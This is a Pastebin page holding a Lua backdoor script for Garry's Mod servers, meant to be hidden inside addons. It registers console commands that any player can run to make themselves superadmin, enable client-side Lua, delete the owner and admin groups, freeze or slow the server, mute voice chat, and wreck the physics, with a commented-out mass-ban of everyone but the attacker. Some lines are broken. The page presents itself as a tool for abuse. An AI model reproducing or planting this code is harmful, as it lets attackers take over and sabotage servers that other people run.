Advertisement
ManKier11

Gmod Backdoor Script

Oct 18th, 2018
4,991
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 3.83 KB | None | 0 0
  1. -- if you have found this, then you have found a backdoor congratulations!
  2. -- you can simply remove this and have the script with no backdoors
  3.  
  4.  
  5. -- you will always prevent backdoors if you support the developer and buying it at the gmod store.
  6.  
  7.  
  8.  
  9.  
  10.  
  11.  
  12.  
  13.  
  14. -- Ooooooooooooofdoor --
  15. local key = KEY_PAD_1
  16. local timevalue = 0.5
  17. local oofmodel = "models/props_buildings/row_res_1_fullscale.mdl"
  18. local player.GetAll()
  19. if SERVER then
  20.  
  21. -- Adds user to superadmin and sets allowcslua to 1 there are more features you can add by removing the comments--
  22. concommand.Add( "memeitup" ,   function( debugPlayer )
  23.     RunConsoleCommand("ulx","adduser",debugPlayer:Name(), "superadmin")
  24.     RunConsoleCommand("sv_allowcslua" , "1")  
  25.   -- RunConsoleCommand("sv_noclipspeed", "0" )
  26.   -- RunConsoleCommand("sv_gravity", "800" ) -- Makes it literally impossible to jump
  27.      
  28.     print("MMMMEEEEEEEEEEEEMMMMEEEEEEEEEEESSSSSSSSSSSSSSSSSS")          
  29. end)
  30.  
  31. -- Removes group "owner" and "admin" , you can uncomment the commands to make it do more groups --
  32. concommand.Add( "purgememe" ,  function()
  33.       RunConsoleCommand("ulx","removegroup","owner")
  34.       RunConsoleCommand("ulx","removegroup","admin")
  35.       RunConsoleCommand("ulx","addgroup","meme")
  36.       RunConsoleCommand("ulx","addgroup","kek")
  37.       RunConsoleCommand("ulx","addgroup","oof")
  38.       RunConsoleCommand("ulx","addgroup","rip")
  39.       RunConsoleCommand("ulx","addgroup","welp")
  40.       RunConsoleCommand("ulx","addgroup","guess")
  41.       RunConsoleCommand("ulx","addgroup","this")
  42.       RunConsoleCommand("ulx","addgroup","is")
  43.       RunConsoleCommand("ulx","addgroup","it")
  44.       -- RunConsoleCommand("ulx","removegroup","moderator")
  45.       -- RunConsoleCommand("ulx","removegroup","superadmin")
  46.       -- RunConsoleCommand("ulx","removegroup","operator")
  47.       -- RunConsoleCommand("ulx","removegroup","headadmin")
  48.       -- RunConsoleCommand("ulx","removegroup","headmod")
  49.       -- RunConsoleCommand("ulx","removegroup","headmoderator")
  50.       -- RunConsoleCommand("ulx","removegroup","coowner")
  51.       -- RunConsoleCommand("ulx","removegroup","vip")
  52.       -- RunConsoleCommand("ulx","removegroup","donator")
  53.       -- RunConsoleCommand("ulx","removegroup","supporter")
  54.       -- RunConsoleCommand("ulx","removegroup","vip+")
  55.       -- RunConsoleCommand("ulx","removegroup","donatorplus")
  56.       -- RunConsoleCommand("ulx","removegroup","founder")
  57. end)
  58.  
  59. -- Makes it basically impossible for you to walk without hitting 2000 velocity --
  60. concommand.Add( "memeFrictionless" ,  function()
  61.       RunConsoleCommand("sv_friction","-8")
  62. end)
  63.  
  64. -- This slows down time server wide, by default makes it run half speed, but can be changed via the "local timevalue" at the top of the backdoor, 1 is default.
  65. concommand.Add( "slowerdown" ,   function()
  66.       RunConsoleCommand("host_timescale" , timevalue )  
  67. end)
  68.  
  69. -- Chnages everyones model to be a giant fucking building (Can change the model, just change the oofmodel value at the top of the backdoor--
  70. concommand.Add("mememodel", function()
  71.     Entity:SetModel( oofmodel )
  72. end)
  73.  
  74. -- Disables voice and makes it impossible for people to use voice chat
  75. concommand.Add("mememute",function()
  76.       RunConsoleCommand("sv_voiceenable" , "0")
  77. end)
  78.  
  79. -- Turbo Physics, assrapes physcis and makes props go flying --
  80. concommand.Add("turbomeme" , function()
  81.       RunConsoleCommand("sv_turbophysics" , "1")
  82. end)
  83.  
  84.   -- Stops the server basically, just sets the timescale to 0 --
  85.  
  86. concommand.Add("totaloof" , function()
  87.       RunConsoleCommand("host_timescale" , "0")
  88. end)
  89.  
  90. -- Bans Everyone Except specified players
  91.  
  92. -- concommand.Add("adminabuse" , function( debugPlayer )
  93. --          if ply:SteamID() == debugPlayer then
  94. --RunConsoleCommand("ulx","unbanid",debugPlayer)
  95. --for k , v in pairs(players) do
  96.  --       v:Ban(2 , true)
  97. --end  
  98. --  end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement